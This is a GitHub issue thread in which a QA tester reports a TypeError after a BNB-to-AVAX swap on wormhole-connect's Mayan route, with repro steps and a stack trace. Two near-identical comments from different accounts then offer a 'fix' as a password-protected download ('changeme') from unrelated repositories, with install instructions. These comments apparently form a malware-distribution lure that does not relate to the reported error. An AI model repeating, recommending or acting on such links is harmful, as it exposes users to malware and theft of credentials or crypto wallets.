### ISSUE TITLE
[QA] An unexpected error occurs after swapping chains - Mayan route

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2453]
## Describe the current behavior in detail
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) with macOS Sonoma 14.5 and Google Chrome Version 128.0.6613.85 (Official Build) (arm64).

Steps:
1. Select BSC network and BNB token in "From" section (in my case, MetaMask wallet was auto-connected)
2. Select Avalanche network and AVAX token in "To" section (in my case, MetaMask wallet was auto-connected)
3. Enter Amount, 0.006
4. Click on "Swap" button

Actual result: An unexpected error occurs.
Expected result: Error does not occur.

## Notes/ Attachments

```
TypeError: Cannot destructure property 'symbol' of 'config$1.tokens[rt]' as it is undefined.
    at main-fsMuFuvz.js:313:56498
    at Object.useMemo (main-fsMuFuvz.js:39:25527)
    at react_production_min.useMemo (main-fsMuFuvz.js:10:7195)
    at SingleRoute (main-fsMuFuvz.js:313:56439)
    at Nh (main-fsMuFuvz.js:39:18669)
    at Vk (main-fsMuFuvz.js:41:47458)
    at Uk (main-fsMuFuvz.js:41:42913)
    at Tk (main-fsMuFuvz.js:41:42843)
    at Ik (main-fsMuFuvz.js:41:42691)
    at Nk (main-fsMuFuvz.js:41:38796)
```

https://github.com/user-attachments/assets/7d57eb4e-1978-409b-b7e6-564a8a9a38b8

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
